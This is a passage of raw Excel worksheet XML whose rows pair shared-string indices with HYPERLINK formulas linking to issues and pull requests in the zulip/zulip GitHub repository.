      </c>
      <c r="E21" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/4039", "https://github.com/zulip/zulip/pull/4039")</f>
        <v>https://github.com/zulip/zulip/pull/4039</v>
      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>26</v>
      </c>
      <c r="B22" t="s">
        <v>42</v>
      </c>
      <c r="C22" t="s">
        <v>43</v>
      </c>
      <c r="D22" t="s">
        <v>10</v>
      </c>
      <c r="E22" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/4488", "https://github.com/zulip/zulip/issues/4488")</f>
        <v>https://github.com/zulip/zulip/issues/4488</v>
      </c>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>27</v>
      </c>
      <c r="B23" t="s">
        <v>42</v>
      </c>
      <c r="C23" t="s">
        <v>44</v>
      </c>
      <c r="D23" t="s">
        <v>10</v>
      </c>
      <c r="E23" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/4720", "https://github.com/zulip/zulip/issues/4720")</f>
        <v>https://github.com/zulip/zulip/issues/4720</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>28</v>
      </c>
      <c r="B24" t="s">
        <v>17</v>
      </c>
      <c r="C24" t="s">
        <v>45</v>
      </c>
      <c r="D24" t="s">
        <v>10</v>
      </c>
      <c r="E24" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/4808", "https://github.com/zulip/zulip/issues/4808")</f>
        <v>https://github.com/zulip/zulip/issues/4808</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>29</v>
      </c>
      <c r="B25" t="s">
        <v>8</v>
      </c>
      <c r="C25" t="s">
        <v>46</v>
      </c>
      <c r="D25" t="s">
        <v>10</v>
      </c>
      <c r="E25" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/4808", "https://github.com/zulip/zulip/issues/4808")</f>
        <v>https://github.com/zulip/zulip/issues/4808</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>30</v>
      </c>
      <c r="B26" t="s">
        <v>22</v>
      </c>
      <c r="C26" t="s">
        <v>47</v>
      </c>
      <c r="D26" t="s">
        <v>10</v>
      </c>
      <c r="E26" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/5118", "https://github.com/zulip/zulip/issues/5118")</f>
        <v>https://github.com/zulip/zulip/issues/5118</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>34</v>
      </c>
      <c r="B27" t="s">
        <v>48</v>
      </c>
      <c r="C27" t="s">
        <v>49</v>
      </c>
      <c r="D27" t="s">
        <v>10</v>
      </c>
      <c r="E27" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/5880", "https://github.com/zulip/zulip/pull/5880")</f>
        <v>https://github.com/zulip/zulip/pull/5880</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>36</v>
      </c>
      <c r="B28" t="s">
        <v>50</v>
      </c>
      <c r="C28" t="s">
        <v>49</v>
      </c>
      <c r="D28" t="s">
        <v>10</v>
      </c>
      <c r="E28" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/5880", "https://github.com/zulip/zulip/pull/5880")</f>
        <v>https://github.com/zulip/zulip/pull/5880</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>44</v>
      </c>
      <c r="B29" t="s">
        <v>51</v>
      </c>
      <c r="C29" t="s">
        <v>52</v>
      </c>
      <c r="D29" t="s">
        <v>10</v>
      </c>
      <c r="E29" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/5880", "https://github.com/zulip/zulip/pull/5880")</f>
        <v>https://github.com/zulip/zulip/pull/5880</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>45</v>
      </c>
      <c r="B30" t="s">
        <v>53</v>
      </c>
      <c r="C30" t="s">
        <v>54</v>
      </c>
      <c r="D30" t="s">
        <v>10</v>
      </c>
      <c r="E30" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/5880", "https://github.com/zulip/zulip/pull/5880")</f>
        <v>https://github.com/zulip/zulip/pull/5880</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>46</v>
      </c>
      <c r="B31" t="s">
        <v>31</v>
      </c>
      <c r="C31" t="s">
        <v>55</v>
      </c>
      <c r="D31" t="s">
        <v>10</v>
      </c>
      <c r="E31" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/6267", "https://github.com/zulip/zulip/pull/6267")</f>
        <v>https://github.com/zulip/zulip/pull/6267</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>47</v>
      </c>
      <c r="B32" t="s">
        <v>42</v>
      </c>
      <c r="C32" t="s">
        <v>56</v>
      </c>
      <c r="D32" t="s">
        <v>10</v>
      </c>
      <c r="E32" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/6608", "https://github.com/zulip/zulip/pull/6608")</f>
        <v>https://github.com/zulip/zulip/pull/6608</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>48</v>
      </c>
      <c r="B33" t="s">
        <v>42</v>
      </c>
      <c r="C33" t="s">
        <v>57</v>
      </c>
      <c r="D33" t="s">
        <v>10</v>
      </c>
      <c r="E33" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/6628", "https://github.com/zulip/zulip/issues/6628")</f>
        <v>https://github.com/zulip/zulip/issues/6628</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>49</v>
      </c>
      <c r="B34" t="s">
        <v>29</v>
      </c>
      <c r="C34" t="s">
        <v>58</v>
      </c>
      <c r="D34" t="s">
        <v>10</v>
      </c>
      <c r="E34" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/6650", "https://github.com/zulip/zulip/pull/6650")</f>
        <v>https://github.com/zulip/zulip/pull/6650</v>
      </c>
    </row>
    <row r="35" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>52</v>
      </c>
      <c r="B35" t="s">
        <v>40</v>
      </c>
      <c r="C35" t="s">
        <v>59</v>
      </c>
      <c r="D35" t="s">
        <v>10</v>
      </c>
      <c r="E35" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/7232", "https://github.com/zulip/zulip/pull/7232")</f>
        <v>https://github.com/zulip/zulip/pull/7232</v>
      </c>
    </row>
    <row r="36" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>54</v>
      </c>
      <c r="B36" t="s">
        <v>17</v>
      </c>
      <c r="C36" t="s">
        <v>60</v>
      </c>
      <c r="D36" t="s">
        <v>10</v>
      </c>
      <c r="E36" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/7667", "https://github.com/zulip/zulip/pull/7667")</f>
        <v>https://github.com/zulip/zulip/pull/7667</v>
      </c>
    </row>
    <row r="37" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>55</v>
      </c>
      <c r="B37" t="s">
        <v>40</v>
      </c>
      <c r="C37" t="s">
        <v>61</v>
      </c>
      <c r="D37" t="s">
        <v>10</v>
      </c>
      <c r="E37" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/7722", "https://github.com/zulip/zulip/pull/7722")</f>
        <v>https://github.com/zulip/zulip/pull/7722</v>
      </c>
    </row>
    <row r="38" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>58</v>
      </c>
      <c r="B38" t="s">
        <v>62</v>
      </c>
      <c r="C38" t="s">
        <v>63</v>
      </c>
      <c r="D38" t="s">
        <v>10</v>
      </c>
      <c r="E38" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/8433", "https://github.com/zulip/zulip/pull/8433")</f>
        <v>https://github.com/zulip/zulip/pull/8433</v>
      </c>
    </row>
    <row r="39" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>59</v>
      </c>
      <c r="B39" t="s">
        <v>11</v>
      </c>
      <c r="C39" t="s">
        <v>64</v>
      </c>
      <c r="D39" t="s">
        <v>10</v>
      </c>
      <c r="E39" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/9127", "https://github.com/zulip/zulip/issues/9127")</f>
        <v>https://github.com/zulip/zulip/issues/9127</v>
      </c>
    </row>
    <row r="40" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>60</v>
      </c>
      <c r="B40" t="s">
        <v>65</v>
      </c>
      <c r="C40" t="s">
        <v>66</v>
      </c>
      <c r="D40" t="s">
        <v>10</v>
      </c>
      <c r="E40" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/9127", "https://github.com/zulip/zulip/issues/9127")</f>
        <v>https://github.com/zulip/zulip/issues/9127</v>
      </c>
    </row>
    <row r="41" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>69</v>
      </c>
      <c r="B41" t="s">
        <v>29</v>
      </c>
      <c r="C41" t="s">
        <v>67</v>
      </c>
      <c r="D41" t="s">
        <v>10</v>
      </c>
      <c r="E41" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/9877", "https://github.com/zulip/zulip/issues/9877")</f>
        <v>https://github.com/zulip/zulip/issues/9877</v>
      </c>
    </row>
    <row r="42" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>71</v>
      </c>
      <c r="B42" t="s">
        <v>11</v>
      </c>
      <c r="C42" t="s">
        <v>68</v>
      </c>
      <c r="D42" t="s">
        <v>10</v>
      </c>
      <c r="E42" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/10273", "https://github.com/zulip/zulip/issues/10273")</f>
        <v>https://github.com/zulip/zulip/issues/10273</v>
      </c>
    </row>
    <row r="43" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>72</v>
      </c>
      <c r="B43" t="s">
        <v>53</v>
      </c>
      <c r="C43" t="s">
        <v>69</v>
      </c>
      <c r="D43" t="s">
        <v>10</v>
      </c>
      <c r="E43" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/10429", "https://github.com/zulip/zulip/pull/10429")</f>
        <v>https://github.com/zulip/zulip/pull/10429</v>
      </c>
    </row>
    <row r="44" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>73</v>
      </c>
      <c r="B44" t="s">
        <v>17</v>
      </c>
      <c r="C44" t="s">
        <v>70</v>
      </c>
      <c r="D44" t="s">
        <v>10</v>
      </c>
      <c r="E44" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/10429", "https://github.com/zulip/zulip/pull/10429")</f>
        <v>https://github.com/zulip/zulip/pull/10429</v>
      </c>
    </row>
    <row r="45" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>74</v>
      </c>
      <c r="B45" t="s">
        <v>8</v>
      </c>
      <c r="C45" t="s">
        <v>70</v>
      </c>
      <c r="D45" t="s">
        <v>10</v>
      </c>
      <c r="E45" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/10429", "https://github.com/zulip/zulip/pull/10429")</f>
        <v>https://github.com/zulip/zulip/pull/10429</v>
      </c>
    </row>
    <row r="46" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>75</v>
      </c>
      <c r="B46" t="s">
        <v>42</v>
      </c>
      <c r="C46" t="s">
        <v>71</v>
      </c>
      <c r="D46" t="s">
        <v>10</v>
      </c>
      <c r="E46" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/10472", "https://github.com/zulip/zulip/issues/10472")</f>
        <v>https://github.com/zulip/zulip/issues/10472</v>
      </c>
    </row>
    <row r="47" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>77</v>
      </c>
      <c r="B47" t="s">
        <v>42</v>
      </c>
      <c r="C47" t="s">
        <v>72</v>
      </c>
      <c r="D47" t="s">
        <v>10</v>
      </c>
      <c r="E47" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/11219", "https://github.com/zulip/zulip/issues/11219")</f>
        <v>https://github.com/zulip/zulip/issues/11219</v>
      </c>
    </row>
    <row r="48" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>79</v>
      </c>
      <c r="B48" t="s">
        <v>73</v>
      </c>
      <c r="C48" t="s">
        <v>74</v>
      </c>
      <c r="D48" t="s">
        <v>10</v>
      </c>
      <c r="E48" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/11561", "https://github.com/zulip/zulip/pull/11561")</f>
        <v>https://github.com/zulip/zulip/pull/11561</v>
      </c>
    </row>
    <row r="49" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>82</v>
      </c>
      <c r="B49" t="s">
        <v>48</v>
      </c>
      <c r="C49" t="s">
        <v>75</v>
      </c>
      <c r="D49" t="s">
        <v>10</v>
      </c>
      <c r="E49" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/11921", "https://github.com/zulip/zulip/pull/11921")</f>
        <v>https://github.com/zulip/zulip/pull/11921</v>
      </c>
    </row>
    <row r="50" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>83</v>
      </c>
      <c r="B50" t="s">
        <v>17</v>
      </c>
      <c r="C50" t="s">
        <v>76</v>
      </c>
      <c r="D50" t="s">
        <v>10</v>
      </c>
      <c r="E50" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/11921", "https://github.com/zulip/zulip/pull/11921")</f>
        <v>https://github.com/zulip/zulip/pull/11921</v>
      </c>
    </row>
    <row r="51" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>85</v>
      </c>
      <c r="B51" t="s">
        <v>17</v>
      </c>
      <c r="C51" t="s">
        <v>77</v>
      </c>
      <c r="D51" t="s">
        <v>10</v>
      </c>
      <c r="E51" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12044", "https://github.com/zulip/zulip/pull/12044")</f>
        <v>https://github.com/zulip/zulip/pull/12044</v>
      </c>
    </row>
    <row r="52" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>86</v>
      </c>
      <c r="B52" t="s">
        <v>8</v>
      </c>
      <c r="C52" t="s">
        <v>78</v>
      </c>
      <c r="D52" t="s">
        <v>10</v>
      </c>
      <c r="E52" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12044", "https://github.com/zulip/zulip/pull/12044")</f>
        <v>https://github.com/zulip/zulip/pull/12044</v>
      </c>
    </row>
    <row r="53" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>92</v>
      </c>
      <c r="B53" t="s">
        <v>79</v>
      </c>
      <c r="C53" t="s">
        <v>80</v>
      </c>
      <c r="D53" t="s">
        <v>10</v>
      </c>
      <c r="E53" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12044", "https://github.com/zulip/zulip/pull/12044")</f>
        <v>https://github.com/zulip/zulip/pull/12044</v>
      </c>
    </row>
    <row r="54" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>94</v>
      </c>
      <c r="B54" t="s">
        <v>53</v>
      </c>
      <c r="C54" t="s">
        <v>81</v>
      </c>
      <c r="D54" t="s">
        <v>10</v>
      </c>
      <c r="E54" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/12063", "https://github.com/zulip/zulip/issues/12063")</f>
        <v>https://github.com/zulip/zulip/issues/12063</v>
      </c>
    </row>
    <row r="55" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>95</v>
      </c>
      <c r="B55" t="s">
        <v>82</v>
      </c>
      <c r="C55" t="s">
        <v>83</v>
      </c>
      <c r="D55" t="s">
        <v>10</v>
      </c>
      <c r="E55" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12109", "https://github.com/zulip/zulip/pull/12109")</f>
        <v>https://github.com/zulip/zulip/pull/12109</v>
      </c>
    </row>
    <row r="56" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>96</v>
      </c>
      <c r="B56" t="s">
        <v>29</v>
      </c>
      <c r="C56" t="s">
        <v>84</v>
      </c>
      <c r="D56" t="s">
        <v>10</v>
      </c>
      <c r="E56" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12678", "https://github.com/zulip/zulip/pull/12678")</f>
        <v>https://github.com/zulip/zulip/pull/12678</v>
      </c>
    </row>
    <row r="57" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>97</v>
      </c>
      <c r="B57" t="s">
        <v>40</v>
      </c>
      <c r="C57" t="s">
        <v>85</v>
      </c>
      <c r="D57" t="s">
        <v>10</v>
      </c>
      <c r="E57" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12726", "https://github.com/zulip/zulip/pull/12726")</f>
        <v>https://github.com/zulip/zulip/pull/12726</v>
      </c>
    </row>
    <row r="58" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>99</v>
      </c>
      <c r="B58" t="s">
        <v>17</v>
      </c>
      <c r="C58" t="s">
        <v>86</v>
      </c>
      <c r="D58" t="s">
        <v>10</v>
      </c>
      <c r="E58" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/12976", "https://github.com/zulip/zulip/issues/12976")</f>
        <v>https://github.com/zulip/zulip/issues/12976</v>
      </c>
    </row>
    <row r="59" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>101</v>
      </c>
      <c r="B59" t="s">
        <v>34</v>
      </c>
      <c r="C59" t="s">
        <v>87</v>
      </c>
      <c r="D59" t="s">
        <v>10</v>
      </c>
      <c r="E59" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/13069", "https://github.com/zulip/zulip/pull/13069")</f>
        <v>https://github.com/zulip/zulip/pull/13069</v>
      </c>
    </row>
    <row r="60" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>102</v>
      </c>
      <c r="B60" t="s">
        <v>8</v>
      </c>
      <c r="C60" t="s">
        <v>88</v>
      </c>
      <c r="D60" t="s">
        <v>10</v>
      </c>
      <c r="E60" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/13137", "https://github.com/zulip/zulip/issues/13137")</f>
        <v>https://github.com/zulip/zulip/issues/13137</v>
      </c>
    </row>
    <row r="61" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>104</v>
      </c>
      <c r="B61" t="s">
        <v>42</v>
      </c>
      <c r="C61" t="s">
        <v>89</v>
      </c>
      <c r="D61" t="s">
        <v>10</v>
      </c>
      <c r="E61" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/13192", "https://github.com/zulip/zulip/issues/13192")</f>
        <v>https://github.com/zulip/zulip/issues/13192</v>
      </c>
    </row>
    <row r="62" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>108</v>
      </c>
      <c r="B62" t="s">
        <v>29</v>
      </c>
      <c r="C62" t="s">
        <v>90</v>
      </c>
      <c r="D62" t="s">
        <v>10</v>
      </c>
      <c r="E62" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/13551", "https://github.com/zulip/zulip/pull/13551")</f>
        <v>https://github.com/zulip/zulip/pull/13551</v>
      </c>
    </row>
    <row r="63" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>109</v>
      </c>
      <c r="B63" t="s">
        <v>17</v>
      </c>
      <c r="C63" t="s">
        <v>91</v>
      </c>
      <c r="D63" t="s">
        <v>10</v>
      </c>
      <c r="E63" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/13793", "https://github.com/zulip/zulip/pull/13793")</f>
        <v>https://github.com/zulip/zulip/pull/13793</v>
      </c>
    </row>
    <row r="64" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>110</v>
      </c>
      <c r="B64" t="s">
        <v>48</v>
      </c>
      <c r="C64" t="s">
        <v>91</v>
      </c>
      <c r="D64" t="s">
        <v>10</v>
      </c>
      <c r="E64" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/13793", "https://github.com/zulip/zulip/pull/13793")</f>
        <v>https://github.com/zulip/zulip/pull/13793</v>
      </c>
    </row>
    <row r="65" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>112</v>
      </c>
      <c r="B65" t="s">
        <v>92</v>
      </c>
      <c r="C65" t="s">
        <v>93</v>
      </c>
      <c r="D65" t="s">
        <v>10</v>
      </c>
      <c r="E65" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/14008", "https://github.com/zulip/zulip/issues/14008")</f>
        <v>https://github.com/zulip/zulip/issues/14008</v>
      </c>
    </row>
    <row r="66" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>113</v>
      </c>
      <c r="B66" t="s">
        <v>17</v>
      </c>
      <c r="C66" t="s">
        <v>94</v>
      </c>
      <c r="D66" t="s">
        <v>10</v>
      </c>
      <c r="E66" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/14091", "https://github.com/zulip/zulip/pull/14091")</f>
        <v>https://github.com/zulip/zulip/pull/14091</v>
      </c>
    </row>
    <row r="67" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>115</v>
      </c>
      <c r="B67" t="s">
        <v>48</v>
      </c>
      <c r="C67" t="s">
        <v>95</v>
      </c>
      <c r="D67" t="s">
        <v>10</v>
      </c>
      <c r="E67" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/14110", "https://github.com/zulip/zulip/pull/14110")</f>
        <v>https://github.com/zulip/zulip/pull/14110</v>
      </c>
    </row>
    <row r="68" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>116</v>
      </c>
      <c r="B68" t="s">
        <v>96</v>
      </c>
      <c r="C68" t="s">
        <v>97</v>
      </c>
      <c r="D68" t="s">
        <v>10</v>
      </c>
      <c r="E68" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/14137", "https://github.com/zulip/zulip/pull/14137")</f>
        <v>https://github.com/zulip/zulip/pull/14137</v>
      </c>
    </row>
    <row r="69" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>121</v>
      </c>
      <c r="B69" t="s">
        <v>53</v>
      </c>
      <c r="C69" t="s">
        <v>98</v>
      </c>
      <c r="D69" t="s">
        <v>10</v>
      </c>
      <c r="E69" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/14595", "https://github.com/zulip/zulip/issues/14595")</f>
        <v>https://github.com/zulip/zulip/issues/14595</v>
      </c>
    </row>
    <row r="70" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>122</v>
      </c>
      <c r="B70" t="s">
        <v>17</v>
      </c>
      <c r="C70" t="s">
        <v>99</v>
      </c>
      <c r="D70" t="s">
        <v>10</v>
      </c>
      <c r="E70" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/14595", "https://github.com/zulip/zulip/issues/14595")</f>
        <v>https://github.com/zulip/zulip/issues/14595</v>
      </c>
    </row>
    <row r="71" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>123</v>
      </c>
      <c r="B71" t="s">
        <v>11</v>
      </c>
      <c r="C71" t="s">
        <v>100</v>
      </c>
      <c r="D71" t="s">
        <v>10</v>
      </c>
      <c r="E71" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/14742", "https://github.com/zulip/zulip/pull/14742")</f>
        <v>https://github.com/zulip/zulip/pull/14742</v>
      </c>
    </row>
    <row r="72" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>124</v>
      </c>
      <c r="B72" t="s">
        <v>101</v>
      </c>
      <c r="C72" t="s">
        <v>102</v>
      </c>
      <c r="D72" t="s">
        <v>10</v>
      </c>
      <c r="E72" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/16017", "https://github.com/zulip/zulip/issues/16017")</f>
        <v>https://github.com/zulip/zulip/issues/16017</v>
      </c>
    </row>
    <row r="73" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>126</v>
      </c>
      <c r="B73" t="s">
        <v>17</v>
      </c>
      <c r="C73" t="s">
        <v>103</v>
      </c>
      <c r="D73" t="s">
        <v>10</v>
      </c>
      <c r="E73" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16190", "https://github.com/zulip/zulip/pull/16190")</f>
        <v>https://github.com/zulip/zulip/pull/16190</v>
      </c>
    </row>
    <row r="74" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>127</v>
      </c>
      <c r="B74" t="s">
        <v>53</v>
      </c>
      <c r="C74" t="s">
        <v>104</v>
      </c>
      <c r="D74" t="s">
        <v>10</v>
      </c>
      <c r="E74" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16190", "https://github.com/zulip/zulip/pull/16190")</f>
        <v>https://github.com/zulip/zulip/pull/16190</v>
      </c>
    </row>
    <row r="75" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>128</v>
      </c>
      <c r="B75" t="s">
        <v>8</v>
      </c>
      <c r="C75" t="s">
        <v>104</v>
      </c>
      <c r="D75" t="s">
        <v>10</v>
      </c>
      <c r="E75" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16190", "https://github.com/zulip/zulip/pull/16190")</f>
        <v>https://github.com/zulip/zulip/pull/16190</v>
      </c>
    </row>
    <row r="76" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>133</v>
      </c>
      <c r="B76" t="s">
        <v>17</v>
      </c>
      <c r="C76" t="s">
        <v>105</v>
      </c>
      <c r="D76" t="s">
        <v>10</v>
      </c>
      <c r="E76" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16213", "https://github.com/zulip/zulip/pull/16213")</f>
        <v>https://github.com/zulip/zulip/pull/16213</v>
      </c>
    </row>
    <row r="77" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>135</v>
      </c>
      <c r="B77" t="s">
        <v>42</v>
      </c>
      <c r="C77" t="s">
        <v>106</v>
      </c>
      <c r="D77" t="s">
        <v>10</v>
      </c>
      <c r="E77" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16649", "https://github.com/zulip/zulip/pull/16649")</f>
        <v>https://github.com/zulip/zulip/pull/16649</v>
      </c>
    </row>
    <row r="78" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>136</v>
      </c>
      <c r="B78" t="s">
        <v>8</v>
      </c>
      <c r="C78" t="s">
        <v>107</v>
      </c>
      <c r="D78" t="s">
        <v>10</v>
      </c>
      <c r="E78" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16769", "https://github.com/zulip/zulip/pull/16769")</f>
        <v>https://github.com/zulip/zulip/pull/16769</v>
      </c>
    </row>
    <row r="79" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>137</v>
      </c>
      <c r="B79" t="s">
        <v>96</v>
      </c>
      <c r="C79" t="s">
        <v>108</v>
      </c>
      <c r="D79" t="s">
        <v>10</v>
      </c>
      <c r="E79" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17014", "https://github.com/zulip/zulip/pull/17014")</f>
        <v>https://github.com/zulip/zulip/pull/17014</v>
      </c>
    </row>
    <row r="80" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>139</v>
      </c>
      <c r="B80" t="s">
        <v>42</v>
      </c>
      <c r="C80" t="s">
        <v>109</v>
      </c>
      <c r="D80" t="s">
        <v>10</v>
      </c>
      <c r="E80" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17386", "https://github.com/zulip/zulip/pull/17386")</f>
        <v>https://github.com/zulip/zulip/pull/17386</v>
      </c>
    </row>
    <row r="81" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>145</v>
      </c>
      <c r="B81" t="s">
        <v>42</v>
      </c>
      <c r="C81" t="s">
        <v>110</v>
      </c>
      <c r="D81" t="s">
        <v>10</v>
      </c>
      <c r="E81" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17707", "https://github.com/zulip/zulip/pull/17707")</f>
        <v>https://github.com/zulip/zulip/pull/17707</v>
      </c>
    </row>
    <row r="82" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>146</v>
      </c>
      <c r="B82" t="s">
        <v>53</v>
      </c>
      <c r="C82" t="s">
        <v>111</v>
      </c>
      <c r="D82" t="s">
        <v>10</v>
      </c>
      <c r="E82" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/18239", "https://github.com/zulip/zulip/pull/18239")</f>
        <v>https://github.com/zulip/zulip/pull/18239</v>
      </c>
    </row>
    <row r="83" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>148</v>
      </c>
      <c r="B83" t="s">
        <v>8</v>
      </c>
      <c r="C83" t="s">
        <v>112</v>
      </c>
      <c r="D83" t="s">
        <v>10</v>
      </c>
      <c r="E83" t="str">
